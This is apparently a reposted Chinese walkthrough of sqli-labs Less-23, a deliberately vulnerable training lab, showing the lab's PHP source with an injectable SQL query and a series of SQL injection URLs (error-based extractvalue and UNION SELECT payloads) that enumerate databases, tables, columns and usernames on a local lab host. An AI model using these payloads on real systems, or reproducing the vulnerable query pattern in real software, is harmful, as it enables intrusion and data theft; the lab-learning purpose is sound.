程序员经验分享-hwhale

sqli-labs————less 23(高级注入篇)

2023-10-31

前言

从这一关开始,我们进进入了短暂的高级注入部分,这一部分中将会陆续介绍一些更为巧妙的注入技巧。

Less -23


查看一下源代码:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-23 **Error Based- no comments**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome   <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#0000ff">';	
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-23.jpg" /></center>
</body>
</html>
关键的sql执行语句: 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);

从该SQL语句中我们可以看出如果我们要构造payload那么我们需要做的就是闭合前面的单引号、同时闭合后面的单引号。


获取mysql数据库的basedir:


同时,这里也可以使用报错注入、延时注入:

报错注入:

注入语句:

http://192.168.11.136/sqli-labs/Less-23?id=1'or extractvalue(1,concat(0x7e,database())) or '1'='1

获取数据库信息:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3


查看数据库security中的数据表:

注入语句:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3


查看user表中的所有列:

注入语句

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),'3

获取表中信息内容:

注入语句:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(username) from security.users limit 0,1),'3


至此,我们完成了一个基本的注入过程。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

渗透测试实战

Sqlilabs实战

sqli-labs————less 23(高级注入篇) 的相关文章

  • 英伟达P100 vs V100 GPU性能

    在选择计算资源时总是纠结不知道哪种显卡好用 请看下面一组对比 数据来源 link 实测效果 训练深层神经网络的时候 V100比P100快大约2倍 综上 V100算力更强劲 预算够的话就选V100

  • 学编程和学机器人有什么区别

    学编程和学机器人有什么区别 小孩的学习从古至今都是家长们相当关心和重视的一件事情 很多的家长在培养孩子的学习方面也可以说是相当的耐心的 就拿现在很多的家长想要孩子去学习机器人编程的课程来说 有的家长对于学编程和学机器人有什么区别并不是很清楚

  • vue配置svg,图标显示不出来

    写在最前面 在Vue中使用svg主要靠webpack配置svg sprite loader来处理svg文件 如果有问题 配置流程按网上的教程一套下来或者直接是扒拉别人的代码还是 有问题的 需要一点webpack的知识进行排查 重点是排查的流

  • 调研

    发现网上可参考的资料太少了 最近有开个专题 文章 视频 从基础原理到编码实现 的想法 不知道是对心理学实验程序设计PSYCHTOOLBOX PTB 感兴趣的人多一些还是对信号处理算法感兴趣的人多一些呢

  • 面向对象的程序设计特点

    面向对象的程序设计特点主要有四个 抽象 封装 继承 多态 1 抽象 首先在面向对象的程序设计中 每一种事物都可以成为 对象 那么一个对象可以有多个特点 比如人有身高 体重等等 把一个事物对象的特点概括表示出来的过程叫做抽象 比如员工对象的薪

  • Vue3 父组件数据改变Echarts子组件图表没有变化

    一 问题 使用vue3写页面 引入一个echarts图 父组件数据改变 图表没有重新渲染 二 目标效果图 三 解决 数据变了 图表不变化 只需要2步 1 echarts图组件监听数据 数据改变 重新渲染 watch gt props cha

  • 04功能之利用string容器的find和substr函数实现分割字符串

    04功能之利用string容器的find和substr函数实现分割字符串 1 C 中string容器的find substr函数 1 size t xxx find string str size t count 0 从目标字符串中 即xx

  • manven命令中build和compile的区别

    compile只是编译工程 既对编译路径下的源代码进行编译 build是构建工程 一般会经过清理 编译 打包等过程 生成最终可运行或可部署的程序包 另外可参考 https blog csdn net wei gg article detai

  • 学计算机的,有点悲哀

    这两天听到的两则消息 第一则 今年的高考报考人数少了74万 今后还将下滑 第二则 就业率比较低的有计算机相关专业 就业半年后失业率比较高的专业中有计算机相关专业 我是计算机老师 并且是刚刚升二本的学校的老师 看看这两条消息 感觉很不适滋味

  • 【FFMPEG】x264 命令行去除B帧

    三种方法 此去除B帧的方法只适用于采用 libx264 编码器编码的视频 引用链接 ffmpeg x264 选项指南 第一种 参数中加 bf 0 ffmpeg i test mp4 vcodec libx264 bf 0 test 640x

  • Python中生成器和迭代器的区别

    Python中生成器和迭代器的区别 代码在Python3 5下测试 Num01 gt 迭代器 定义 对于list string tuple dict等这些容器对象 使用for循环遍历是很方便的 在后台for语句对容器对象调用iter 函数

  • 学习笔记:固件和驱动的区别?

    驱动和固件是经常会看到的字眼 尤其是在IoT设备的使用 安装过程中有时很容易搞糊涂 本文根据自己的理解对https www zhihu com question 22175660 驱动与固件的区别是什么 进行了部分整理而成 如有误导 请见谅

  • 几何检测

    概述 几何检测主要相交性检测 这里的内容大体上是根据 3D数学基础 图形与游戏开发 这本书来的 对于这本书来说 这一部分看完了后面内容就不看了 因为后面讲的太空泛了 有点像一本绝世武功的目录一样 看似很强 其实没什么卵用 1 2D隐式直线上

  • 解决报错:TypeError: log_sigmoid(): argument ‘input‘ (position 1) must be Tensor, not torch.return_types.

    报错如下 TypeError log sigmoid argument input position 1 must be Tensor not torch return types max torch max 的返回类型为 torch re

随机推荐

热门标签